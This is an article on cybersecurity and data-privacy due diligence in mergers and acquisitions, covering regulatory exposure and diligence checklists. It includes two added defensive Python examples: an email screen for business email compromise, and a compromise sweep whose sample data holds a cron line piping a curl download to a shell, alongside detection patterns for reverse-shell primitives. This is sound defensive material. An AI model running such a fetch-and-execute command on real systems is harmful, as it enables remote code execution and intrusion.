By Richard D. Harroch, Jennifer Martin, and Richard V. Smith
Data privacy, cybersecurity, and data breach risks are important due diligence issues in mergers and acquisitions. Post-acquisition discovery of security problems, and even notifiable breaches, is a far too common scenario.
According to one report, more than a third (40%) of acquiring companies engaged in a merger and acquisition proceeding said they discovered a cybersecurity problem during the post-acquisition integration of the acquired company. The most highly publicized example of this was Verizon’s discovery of a prior data breach at Yahoo! after having executed an acquisition agreement to acquire the company.
This post-diligence disclosure almost scuttled the deal, and ultimately resulted in a $350 million reduction in the purchase price paid by Verizon, with Yahoo! required to pay a $35 million penalty to settle securities fraud charges alleged by the U.S. Securities and Exchange Commission (SEC) and an additional $80 million to settle securities lawsuits brought by unhappy shareholders.
This article summarizes the growing potential risks—legal, financial, reputational, and operational—associated with cybersecurity, and also provides practical solutions on how to identify, understand, and mitigate those risks during the M&A due diligence process.
Cybersecurity Risk Landscape
Even for those acquiring companies that intend to scrutinize data security issues as part of the M&A due diligence process, the lawyers conducting such diligence often lack an adequate understanding of the current cybersecurity threat landscape or of the particular risks associated with the target company. More often than not, the lawyers ask a battery of routine, privacy-related questions of a company even when that company does not collect or handle consumer personal data.
The focus on privacy, and not security more generally, is due in part to a general lack of awareness of broader cybersecurity issues, and a hyperawareness of the risks associated with data breaches. To a large degree, an overemphasis on data breach risks is not surprising since companies must publicly disclose breaches of personal data to consumers, and the media frequently focuses considerable attention on these breaches, especially large-scale ones.
The public is beginning to become more aware, however, of the threat of other types of information compromises, including ransomware attacks (in which data is rendered unusable unless a “ransom” payment is made), phishing emails (fraudulent emails sent to trick recipients into providing passwords or other valuable information), and the theft and selective disclosure of sensitive information for embarrassment and harassment (consider, for example, the Sony and Democratic National Committee hacks, in which sensitive emails were made public).
Moreover, companies have always grappled with the theft of proprietary information and trade secrets. While such thefts do not require notification to consumers, the theft of valuable intellectual property and trade secrets can have a devastating impact on a company, particularly young startup companies developing new technologies. The loss of valuable intellectual property can significantly decrease the value of a target company to prospective buyers. Similarly, the value of a company can be manipulated by trading on stolen inside information.
In short, criminal hackers are resorting to a broader array of techniques to monetize and exploit information, and the methods used to acquire that information are increasingly stealthy and sophisticated, making it difficult to defend against and detect such attacks. For example, through advanced techniques allowing for covert surveillance, attackers can monitor and steal data, often sensitive proprietary information or strategies (business, political, or military) over a long period of time without detection.
But the most serious computer threats do not target information or data at all. The NotPetya malware, a purely destructive attack, destroyed entire networks and systems for some of the largest companies in the world, including Merck, Maersk, and FedEx, and cost companies worldwide an estimated $10 billion in damages.
On a smaller scale, the manipulation of the software used in autonomous vehicles, for example, can result in personal injury or death. Or a single component in a mass-market consumer device can be used to disrupt the availability of a vast swath of the Internet, as the Mirai botnet of compromised IoT devices demonstrated in 2016.
Regulators, customers, and investors have been quick to react to these evolving threats. A delay by a company in discovering and reporting a data breach can result in significant public criticism of the company as well as legal exposure, including the risk of substantial fines and potential liabilities due to class action lawsuits and shareholder derivative actions. The FTC and state Attorneys General frequently bring enforcement actions relating to delays in reporting a data breach, including in several high-profile breaches such as Equifax, Uber, and, most recently, Google+. Such scrutiny is also a risk for companies that acquire a breached company.
The SEC is also stepping up enforcement actions against public companies that fail to adequately disclose not only actual security incidents, but risks associated with cybersecurity. Specifically, pursuant to its February 2018 Commission Statement and Guidance on Public Company Cybersecurity Disclosures, additional public statements, and its April 2018 SEC settlement order with Yahoo!, the SEC has outlined its expectations for handling disclosure obligations relating to cybersecurity incidents.
Such obligations include, but are not limited to, having sufficient systems of internal controls and processes to ensure an appropriate level of risk-management oversight of an incident, including satisfying SEC disclosure obligations following discovery of an incident; amending or correcting prior material misstatements regarding cybersecurity in risk factor and MD&A disclosures; and instituting trading blackouts, as appropriate.
In fact, the SEC recently investigated nine companies that were victimized by a common cyber-related fraud scheme, whereby accounting personnel received fake emails, purportedly from company executives or vendors, instructing them to wire large sums of money to accounts controlled by the perpetrators. Not only did those nine companies lose over $100 million in aggregate to the fraudsters, the SEC investigated them for potential violations of federal securities laws for failing to have in place a sufficient system of internal financial accounting controls.
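The scheme described above is detectable with a few inexpensive controls at the mail gateway or in the accounts-payable workflow. The following screen is an added example written for this article, not code from the authors, the SEC, or any vendor; it assumes a corporate domain, a list of executive display names and approved vendor domains (all hypothetical), and runs over four constructed messages. It flags a payment request when the sender also shows one of the classic BEC anomalies: an executive's display name on an external address, a Reply-To domain that differs from the From domain, or a sender domain one or two characters away from a trusted one.

```python
"""Heuristic screen for business email compromise (BEC) payment requests.

Added example, not from the article. CORP_DOMAIN, EXECUTIVES,
VENDOR_DOMAINS and SAMPLE_MESSAGES are constructed for illustration.
"""
import re
from email.utils import parseaddr

CORP_DOMAIN = "example.com"                 # assumed corporate domain
EXECUTIVES = {"Jane Doe", "John Roe"}       # assumed executive display names
VENDOR_DOMAINS = {"acme-supplies.com"}      # assumed approved vendor domains

PAYMENT_RE = re.compile(r"\b(wire|transfer|remit|payment|invoice|bank details|account number)\b", re.I)
URGENCY_RE = re.compile(r"\b(urgent|immediately|today|asap|confidential)\b", re.I)
SENDER_ANOMALY_PREFIXES = ("requests", "urgency")  # findings that are not sender anomalies


def levenshtein(a, b):
    """Edit distance, used to spot lookalike domains (acme-suppiies vs acme-supplies)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value):
    """Domain part of an RFC 5322 address header, lower-cased (so a capital I
    used as a homoglyph for l collapses to i and is caught by edit distance)."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def is_lookalike(domain, trusted):
    """True when domain is a near miss (distance 1-2) of a trusted domain but not an exact match."""
    return domain not in trusted and any(levenshtein(domain, t) <= 2 for t in trusted)


def score_message(msg):
    """Return the list of findings for one message dict (from, reply_to, subject, body)."""
    findings = []
    display_name, _ = parseaddr(msg["from"])
    sender_domain = domain_of(msg["from"])
    if display_name in EXECUTIVES and sender_domain != CORP_DOMAIN:
        findings.append("executive display name on external domain")
    if is_lookalike(sender_domain, {CORP_DOMAIN} | VENDOR_DOMAINS):
        findings.append(f"lookalike sender domain {sender_domain}")
    reply_to = msg.get("reply_to")
    if reply_to and domain_of(reply_to) != sender_domain:
        findings.append("reply-to domain differs from sender domain")
    text = msg["subject"] + " " + msg["body"]
    if PAYMENT_RE.search(text):
        findings.append("requests a payment or banking change")
        if URGENCY_RE.search(text):
            findings.append("urgency language")
    return findings


def is_suspicious(msg):
    """A payment request combined with at least one sender anomaly should be
    routed for out-of-band verification before any funds move."""
    findings = score_message(msg)
    asks_for_money = "requests a payment or banking change" in findings
    sender_anomaly = any(not f.startswith(SENDER_ANOMALY_PREFIXES) for f in findings)
    return asks_for_money and sender_anomaly


# Constructed sample messages (not real mail).
SAMPLE_MESSAGES = [
    {"from": "Jane Doe <jane.doe@gmail.com>", "reply_to": "Jane Doe <ceo.jane@outlook.com>",
     "subject": "Urgent wire", "body": "I am in a meeting, please wire $48,000 today. Confidential."},
    {"from": "Accounts Payable <billing@acme-suppIies.com>", "subject": "Invoice 4471",
     "body": "Please note our updated bank details and remit payment to the new account."},
    {"from": "Jane Doe <jane.doe@example.com>", "subject": "PO 1188",
     "body": "Please approve the wire to Acme per the attached purchase order."},
    {"from": "Bob Partner <bob@partner.org>", "subject": "Lunch",
     "body": "Are we still on for lunch next week?"},
]

if __name__ == "__main__":
    for m in SAMPLE_MESSAGES:
        print(is_suspicious(m), score_message(m))
```

The third message is the important negative case: a genuine executive asking for a genuine wire produces a payment finding but no sender anomaly, so it is not flagged. The screen is a triage aid, not a substitute for the out-of-band callback control the SEC report contemplates.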
Finally, many highly regulated industries are required to comply with specific security standards and controls, and to promptly report incidents. For example, pursuant to the Gramm-Leach-Bliley Act, financial institutions are required to implement information security protections to safeguard financial information and to notify their regulators in the event of unauthorized access to such data. The healthcare industry is subject to similar requirements under the Health Insurance Portability and Accountability Act of 1996 (HIPAA).
In other sectors, more stringent requirements may apply. For example, as of January 1, 2018, companies that contract with the Department of Defense are required to comply with the NIST 800-171 standard and report any incidents that impact systems on which government information is stored or processed. Similarly, energy companies regulated by the Federal Energy Regulatory Commission (FERC) are required to comply with Critical Infrastructure Protection reliability standards; FERC is also currently working on mandatory cybersecurity incident reporting rules.
In addition, vendors, suppliers, and other providers of regulated companies are often contractually required to follow these requirements as well, regardless of their size. Thus, companies targeted for acquisition may also be subject to significant contractual obligations regarding cybersecurity. For example, companies that handle credit card information through an e-commerce platform, mobile application, or as a processing vendor are required by banks and credit card issuers to comply with the PCI DSS cybersecurity standards; a failure to satisfy those obligations can result in significant fines and even contract termination. More and more frequently, contracts are requiring vendors across industry sectors to comply with specific security requirements, and to notify contracting partners in the event of an incident.
Mitigating Risk Through Due Diligence
Against this backdrop, it is imperative that an acquirer considering an acquisition fully investigate and identify the particular cybersecurity and data privacy risks and liabilities posed by the transaction. It is equally important that the selling company anticipate cybersecurity and data privacy issues. Notably, because a selling company may not even be aware of a prior or current compromise that may be pertinent to the deal, it is also incumbent upon the acquirer to consider other means of conducting due diligence in this area.
At a minimum, the acquirer’s due diligence investigation should focus on the following:
- Identifying the particular types of privacy and cybersecurity risks the target company faces given its industry sector, geographic reach, and the nature of the products and/or services that it manufactures, develops, or provides.
- Understanding the network and system architecture and data flows, including the use of cloud providers and third-party applications.
- Understanding the extent to which the selling company gathers and uses personal information, especially customer personal information and highly sensitive proprietary information, including information provided by business partners and/or governmental agencies.
- Reviewing commitments and representations made by the selling company to its users and customers in connection with privacy and security issues, including contractual obligations.
- Recognizing whether the acquirer will need to obtain any consents to use personal or private information of the selling company post-closing.
- Asking whether the selling company has experienced any prior cybersecurity incidents, including data breaches, and how it has responded to such incidents.
- Determining whether the selling company has a written security program that meets current regulatory and industry standards and best practices, including with respect to organizational (policies), operational (processes), and technical controls.
- Assessing the acquirer’s potential liability, compliance posture, and/or notification obligations that might exist after completion of the acquisition.
In the remainder of this article, we outline several types of due diligence inquiries and procedures that an acquirer may wish to undertake in connection with its investigation of data privacy and cybersecurity issues. As with any M&A due diligence review, the nature of the inquiry and the procedures employed should be tailored to the situation. Accordingly, not every item discussed below will be appropriate for every data privacy and cybersecurity due diligence review.
1. Review of Selling Company Policies and Contracts
Initially, an acquirer should request and review copies of various policies, contracts, and other documents of the selling company, including the following:
- Privacy policies (current and historical), and whether and to what extent the selling company has deviated from them
- Telemarketing and email marketing policies
- Security policies, including but not limited to the selling company’s Information Security Policy, Acceptable Use Policy, and Data Classification Policy
- Results of security audits and assessments, vulnerability scans, and penetration tests
- Privacy and security program maturity plans
- Privacy impact assessment processes and assessment reports
- Certifications (e.g., ISO 27001/2, PCI DSS, SOC) and audit records
- A list of business-to-business customer contracts, particularly with public companies in the financial, health, energy, telecommunications, and other highly regulated industries
- Contracts with the selling company’s vendors, suppliers, and providers
- Incident response plans and playbooks
- Privacy and information security training materials, and a description of the training program
- Employee background investigation processes and policies, and onboarding processes
- Organization and reporting structure as it relates to the security function, and any information regarding executive management of cybersecurity and privacy risk
- GDPR-related compliance materials, as applicable
- Software development processes and documentation
- Insurance policies protecting the company from cybersecurity or data breach issues (including claims history)
- Whether there are appropriate systems of internal accounting controls to guard against fraudulent requests for money
2. Review of Procedures to Protect the Selling Company’s Data
The acquirer also should review the procedures the selling company has put in place to protect its employee, customer, and business partners’ data and information as well as its networks and systems:
- Does the company have a written cybersecurity program that establishes administrative, operational, and technical controls to mitigate security risks?
- Does the selling company have appropriate policies, including at a minimum an Information Security Policy, an employee-facing Acceptable Use Policy, and a Data Classification and Handling Policy?
- Does the selling company conduct regular risk assessments, and vulnerability and penetration testing of systems?
- Does the selling company have dedicated security personnel?
- Does the selling company perform an annual risk assessment relating to privacy and cybersecurity?
- Does the selling company train its employees on privacy and security best practices?
- Does the selling company have a comprehensive Incident Response Plan and is it tested?
- Does the selling company manage vendor risk?
- Does the selling company have a business continuity and disaster recovery plan, and back-up protocols?
- Does the selling company protect the physical security of its facilities and assets?
- Does the selling company implement “reasonable” technical security controls (or comply with mandatory standards), including, for example, anti-virus software, encryption, access controls, network monitoring, authentication, and asset management?
- Does the selling company have an insider threat program to detect the potential theft of proprietary information or intellectual property?
- Does the selling company require privacy impact assessments when implementing new systems or processes?
3. Review of Past Data Breaches Against the Selling Company
The acquirer should be especially concerned about past data breaches against the selling company or intrusions into its computer network.
- Is the selling company aware of any prior cybersecurity incidents, including but not limited to the compromise of sensitive data? A description or report of all prior known incidents should be requested.
- How were any such incidents discovered or detected?
- Did the selling company conduct an investigation and what was the methodology and scope? Was a third-party forensic consultant engaged to investigate the incident? Any investigative reports relating to cybersecurity incidents should be requested.
- What was the impact of the incident on the selling company’s data or systems? What was the scope of the compromise or data impact?
- Has the selling company experienced any theft or suspected theft of proprietary information or intellectual property? If so, when and what kind of information was stolen? Was the subject of the investigation an insider (employee, contractor, or ex-employee) or a third-party intruder?
- Has the selling company experienced a potential breach of personal data? When? Were notifications made? Why or why not? Did the selling company consult with external counsel on legal obligations?
- Has the selling company been defrauded or extorted as a result of an email compromise?
- What remedial actions or patches were implemented to fix any vulnerabilities or other root causes that resulted in an incident or potential incident?
- How often are networks, systems, applications, and other digital assets scanned for vulnerabilities or subject to penetration testing?
4. Is the Selling Company in Compliance with Applicable Laws and Standards?
There are a variety of laws that set forth security and privacy requirements, including notification obligations, the scope of which depends on the selling company’s industry sector or the service or product it develops, manufactures, or provides. It is critical to understand what laws may apply to the selling company and to inquire whether the selling company is governed by and compliant with particular laws, regulations, and standards. Bear in mind that many of these requirements are pushed down by contract to subcontractors, vendors, suppliers, and other providers of covered entities, even when such vendors are not directly regulated.
The following is a non-exhaustive list of potentially applicable laws for illustrative purposes (appropriate security or privacy counsel should be consulted in any particular M&A due diligence investigation):
General Consumer Privacy and Data Security Laws
- European Union GDPR – Europe’s framework for data protection laws for companies that collect or process the personal data of individuals in the EU; the GDPR has a global reach because it regulates any company, wherever located, that collects or processes such data.
- The federal Children’s Online Privacy Protection Act (COPPA) – Regulates the online collection of personal information from children under the age of 13, requiring publication of a privacy notice and verifiable parental consent before such information is collected.
- Telephone Consumer Protection Act – Imposes restrictions on telemarketing.
- State Data Breach Notification Laws – All 50 U.S. states require customer notification of security breaches involving personal information; moreover, many states are establishing minimal “reasonable” standards to protect consumer data.
- CAN-SPAM Act – Places restrictions on commercial email marketing.
- Evolving federal and state laws – For example, the California Consumer Privacy Act of 2018, which gives California residents GDPR-style rights of access, deletion, transparency, and control over the sale of their personal information.
Financial Services Industry
- Gramm-Leach-Bliley Act – Imposes privacy and security obligations on insurance companies, banks, and other covered financial institutions with respect to customer financial records.
- New York Department of Financial Services Cybersecurity Rules – Imposes specific security requirements, including technical controls, and reporting obligations on licensed entities—the requirements are directed at the security of the systems underlying the financial sector, not simply on data.
- Payment Card Industry Data Security Standard (PCI DSS) – Information security standard that applies to organizations that handle branded credit cards; compliance with PCI DSS is historically a contractual requirement of credit card issuers and acquiring banks, but states are beginning to adopt it as a regulatory requirement.
Health Care Industry
- Health Insurance Portability and Accountability Act (HIPAA) – Provides privacy and security requirements and notification obligations to protect patients’ medical records.
- FDA Pre-Market and Post-Market Cybersecurity Guidance on Connected Medical Devices – Establishes best practices for the development and manufacture of connected medical devices throughout the life of the device.
Government Contractors and Critical Infrastructure
- DFARS 252.204-7012 – Requires defense contractors to comply with the NIST SP 800-171 security standard and to report cyber incidents affecting covered defense information.
- Critical Infrastructure Protection (CIP) Reliability Standards – Developed by NERC and approved and enforced by the Federal Energy Regulatory Commission (FERC), these standards impose mandatory security requirements on owners and operators of the bulk electric system.
5. Review of Litigation and Complaints
The acquirer will want to carefully review any litigation or regulatory inquiries affecting the selling company:
- Has the selling company received any litigation claims concerning its privacy or security practices, including class action or shareholder derivative suits post-breach?
- Has the selling company received any governmental or regulatory notices about its privacy or security practices, including from the FTC or the SEC, state Attorneys General, or particular industry regulators? Is the selling company under a current regulatory (e.g., FTC) consent decree or monitoring order?
- Has the selling company notified governmental or regulatory authorities and/or affected persons of a data breach or other incident, and are mandatory notification requirements triggered?
- Has the selling company received breach of contract claims for failure to comply with contractual requirements, including post-incident?
- Has the selling company received privacy or security complaints from its customers?
- Has the selling company settled any claims or complaints? If so, on what terms?
6. Other Pre-Acquisition Due Diligence
Cybersecurity due diligence also may require the consideration of more “invasive” technical methodologies unfamiliar in the traditional M&A due diligence context. The following additional steps are particularly important when the seller or the buyer is in a highly regulated and/or critical infrastructure industry, is a government contractor, or where post-acquisition notification of prior breaches may be required.
- Require the selling company to engage a third-party security company to run vulnerability scans or penetration tests on critical assets (for example, those that store sensitive data or valuable intellectual property) and applications.
- Engage a third-party security company to scan systems for artifacts of current or past compromises (no one wants to acquire a Russian Advanced Persistent Threat (APT) along with their investment).
If such measures cannot be taken prior to acquisition, an acquirer must consider such assessments prior to integration of networks and systems to ensure that any existing infections, malware, or compromises do not spread to the acquirer’s environment.
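A sweep for artifacts of compromise, as recommended above, usually starts with three cheap checks before any deeper forensics: known-bad file hashes, persistence entries that execute downloaded or decoded payloads, and outbound connections that repeat on a fixed timer (malware check-in “beaconing”). The block below is an added example written for this article, not the tool of any assessment firm; every input is constructed (the indicator list, the host inventory, the cron lines, and the connection log, which uses the reserved documentation address ranges and an assumed `ts src= dst= bytes=` format).

```python
"""Minimal compromise-artifact sweep over a constructed host inventory.

Added example, not from the article. All indicators and inventory data are
constructed; the hashes are derived from constructed byte strings, not real
malware samples.
"""
import hashlib
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed indicator list: SHA-256 of a constructed "sample", not a real IOC.
BAD_SHA256 = {
    hashlib.sha256(b"constructed dropper sample").hexdigest(): "constructed-dropper",
}

# Persistence commands that should never appear in a legitimate cron or scheduled task.
PERSISTENCE_PATTERNS = [
    (re.compile(r"(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"/dev/tcp/|\bnc\b[^;|]*\s-e\b"), "reverse shell primitive"),
]

LOG_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) bytes=(\d+)$")  # assumed log format


def hash_matches(files):
    """files: {path: bytes}. Return [(path, label)] for contents on the indicator list."""
    hits = []
    for path, content in files.items():
        label = BAD_SHA256.get(hashlib.sha256(content).hexdigest())
        if label:
            hits.append((path, label))
    return hits


def persistence_findings(entries):
    """entries: cron / scheduled-task command lines. Return [(entry, label)]."""
    return [(e, label) for e in entries for pat, label in PERSISTENCE_PATTERNS if pat.search(e)]


def beaconing(log_lines, min_count=6, max_cv=0.15):
    """Flag destinations contacted at nearly constant intervals.

    Intervals between successive connections to one destination are measured;
    a low coefficient of variation (stdev / mean) is the signature of a timer
    rather than a human. Returns [(dst, mean_interval_s, cv)].
    """
    by_dst = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # lines that do not fit the assumed format are skipped
        ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
        by_dst[m.group(3)].append(ts)
    flagged = []
    for dst, times in by_dst.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            flagged.append((dst, round(mean), round(cv, 3)))
    return flagged


# --- Constructed host inventory -------------------------------------------
T0 = datetime(2019, 3, 1, 9, 0, tzinfo=timezone.utc)


def _line(t, dst, nbytes):
    return f"{t.strftime('%Y-%m-%dT%H:%M:%SZ')} src=10.1.2.3 dst={dst} bytes={nbytes}"


SAMPLE_LOG = (
    # a 5-minute check-in with a few seconds of jitter (203.0.113.0/24 is TEST-NET-3)
    [_line(T0 + timedelta(seconds=300 * i + (i % 3) * 4), "203.0.113.5:443", 512) for i in range(8)]
    # ordinary, irregular traffic to a second documentation address
    + [_line(T0 + timedelta(seconds=s), "198.51.100.10:443", 20000)
       for s in (7, 95, 130, 800, 801, 2400, 2403, 3900)]
)
SAMPLE_FILES = {"/tmp/.x/update": b"constructed dropper sample", "/usr/bin/ls": b"harmless binary"}
SAMPLE_CRON = ["0 2 * * * /usr/bin/backup --full", "*/10 * * * * curl -s http://203.0.113.5/u | sh"]


def sweep(files=SAMPLE_FILES, cron=SAMPLE_CRON, log=SAMPLE_LOG):
    """Run all three checks and return the findings by category."""
    return {"hashes": hash_matches(files), "persistence": persistence_findings(cron), "beacons": beaconing(log)}


if __name__ == "__main__":
    for category, findings in sweep().items():
        print(category, findings)
```

On the constructed data the sweep returns one hash hit, one persistence hit, and one beaconing destination with a mean interval of about 300 seconds and a coefficient of variation near 0.02, while the irregular traffic is left alone. In a real engagement the hash list would come from threat-intelligence feeds and the beaconing thresholds would be tuned against the network's own baseline.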
Cybersecurity due diligence has become increasingly important for M&A transactions. Savvy acquirers understand the potential for significant liabilities resulting from a selling company’s failure to properly identify and handle prior data breaches or other cybersecurity incidents. Less frequently discussed is how a prior cybersecurity incident may impact the value of a selling company, such as when valuable intellectual property has been stolen or when mandatory disclosure of an incident post-acquisition results in significant reputational damage and lost business.
Similarly, a failure to comply with contractual and regulatory requirements may require a buyer to invest significant resources to bring a selling company into compliance and to mitigate privacy and cybersecurity risks.
A thorough and thoughtful due diligence investigation of the selling company’s cybersecurity and data privacy situation is critical for an acquirer to assess the risks and liabilities it may take on by making an acquisition, and whether such risks are relevant to accurately assessing the value of the target company.
Copyright © by Richard D. Harroch. All Rights Reserved.
A note of thanks to Sam Casciato, an IT and cybersecurity engineer at Talix, Inc., for his helpful feedback on this article.
About the Authors
Richard D. Harroch is a Managing Director and Global Head of M&A at VantagePoint Capital Partners, a large venture capital fund in the San Francisco area. His focus is on Internet, digital media, and software companies, and he was the founder of several Internet companies. His articles have appeared online in Forbes, Fortune, MSN, Yahoo, FoxBusiness, and AllBusiness.com. Richard is the author of several books on startups and entrepreneurship as well as the co-author of Poker for Dummies and a Wall Street Journal-bestselling book on small business. He is the co-author of the recently published 1,500-page book by Bloomberg, Mergers and Acquisitions of Privately Held Companies: Analysis, Forms and Agreements. He was also a corporate and M&A partner at the law firm of Orrick, Herrington & Sutcliffe, with experience in startups, mergers and acquisitions, and venture capital. He has been involved in over 200 M&A transactions and 250 startup financings. He can be reached through LinkedIn.
Jennifer Martin is a partner in the Silicon Valley office of Orrick, Herrington & Sutcliffe LLP, and a member of the firm’s Cyber, Privacy, and Data Innovation practice. She advises clients on best practices for mitigating cybersecurity risks across industries, including counseling on cybersecurity program compliance and resiliency on an industry-by-industry basis; managing significant security incidents and providing cross-disciplinary incident response planning; drafting commercial contract terms and requirements for purchasers and vendors; and conducting cybersecurity due diligence in M&A transactions. She has focused on cybersecurity from the legal, technical, and policy perspectives for nearly 20 years from government, in-house, and private practice and consulting perspectives. Read her full profile on Orrick.com.
Richard V. Smith is a partner in the Silicon Valley and San Francisco offices of Orrick, Herrington & Sutcliffe LLP, and a member of its Global Mergers & Acquisitions and Private Equity Group. He specializes in the areas of mergers and acquisitions, corporate governance, and activist defense. Richard has advised on more than 400 M&A transactions and has represented clients in all aspects of mergers and acquisitions transactions involving public and private companies, corporate governance, and activist defense. He is the co-author of the recently published 1,500-page book by Bloomberg, Mergers and Acquisitions of Privately Held Companies: Analysis, Forms and Agreements. Read his full profile on Orrick.com.
The post Data Privacy and Cybersecurity Issues in Mergers and Acquisitions: A Due Diligence Checklist to Assess Risk appeared first on AllBusiness.com.